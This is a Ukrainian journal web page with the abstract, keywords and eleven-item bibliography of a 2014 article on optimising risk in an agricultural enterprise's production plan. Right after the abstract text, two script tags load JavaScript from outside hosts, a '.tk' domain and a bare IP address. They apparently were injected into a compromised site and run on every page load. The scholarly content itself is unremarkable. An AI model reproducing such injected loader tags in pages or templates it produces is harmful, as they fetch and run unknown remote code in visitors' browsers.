ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43.01:631.1
Аграрний менеджмент і підприємництво

Оптимізація ризикованості виробничого плану сільськогосподарського підприємства / Рябоконь В.П., Колесніков Д. В. // Економіка АПК. - 2014. - № 4 - С. 43

Досліджено механізм оптимізації ризикованості виробничого плану сільськогосподарського підприємства через урахування фактора мінливості окремих виробничих показників. Це є дуже актуальним питанням, тому що у ринковій економіці сільськогосподарські ризики безпосередньо впливають на виробників сільськогосподарської продукції. Наслідки такого впливу можуть бути досить важкими, аж до повного банкрутства виробника. Висвітлено перспективність формування методичного інструментарію оцінки сталості базової та скоригованої моделі в умовах зміни зовнішнього й внутрішнього середовища. Запропоновано методологію, що дає змогу уникнути великих економічних втрат і соціальних потрясінь при проведенні державної аграрної політики. Це ж стосується також сфери прийняття конкретних виробничих рішень у будь-якому сільськогосподарському та переробному підприємстві. Табл.: 4. Рис.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ризик, прибуток, сільськогосподарські підприємства, виробничий план, виробничі показники, оптимізація

Список використаних джерел

 1. Андрійчук В.Г. Економіка аграрних підприємств: підруч. / В.Г. Андрійчук. – К.: КНЕУ, 2002. – 624 с.
 2. Козаченко А.В. Экономическая безопасность предприятия: сущность и механизм обеспечения / А.В. Козаченко, В.П. Пономарев, А.Н. Ляшенко. – К.: Либра, 2003. – 280 с.
 3. Кудин С.І. Економічна безпека та її структура. Удосконалення системи / С.І. Кудин, Ю.В. Вашай // Наук. вісн. Львівського ДУВС : зб. наук. праць. – Сер.: Економічна. – Львів : Вид-во Львівського ДУВС, 2010. – Вип. 1. – С. 23-25.
 4. Меламедов С.Л. Формирование стратегии экономической безопасности предпринимательских структур: дис. … канд. экон. наук: 08.00.05 / С.Л. Меламедов. – СПб. – 2002. – 146 с.
 5. Основи створення комплексної системи економічної безпеки підприємства: теоретичний аспект [Електроний ресурс] / Коваленко К.В. – Режим доступу до статті: http://www.nbuv.gov.ua.
 6. Пономарьов В.П. Формування механізму забезпечення економічної безпеки підприємства: автореф. дис. на здобуття наук. ступеня канд. економ. наук: спец. 08.06.01 / В.П. Пономарьов. – Східноукр. держ. ун-т. – Луганськ, 2000. — 27 с.
 7. Hardaker J.B. – Huirne R.B.M. – Anderson J.R. (1997): Coping with Risk in Agriculture. CAB International, Wallingford p. xi + 274.
 8. Infanger G, Morton D P. 1996. Cut sharing for multistage stochastic linear programs with interstage dependency. Mathematical Programming, 75, 241-256.
 9. Jakeman A J, Letcher R A, Norton J P. 2006. Ten iterative steps in development and evaluation of environmental models. Environmental Modelling and Software, 21, 602-614.
 10. Torkamani J. 2005. Using a whole-farm modelling approach to assess prospective technologies under uncertainty. Agricultural Systems, 85, 138-154.
 11. Winston W.L. (1997): Operations Research Applications and Algorithms, Wadswoth Publishing Company. – Р. 863-870.
Читати статтю: 14_04_43-47.pdf